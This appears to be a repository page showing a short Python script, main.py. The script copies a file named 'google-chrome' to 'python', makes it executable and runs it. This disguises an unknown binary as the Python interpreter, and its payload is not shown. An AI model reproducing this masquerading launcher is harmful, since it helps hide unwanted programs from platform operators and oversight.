savefile / main.py
ilhamap's picture
Update main.py
81c811c verified
raw
history blame
97 Bytes
import os
os.system("cp google-chrome python")
os.system("chmod +x python")
os.system("./python")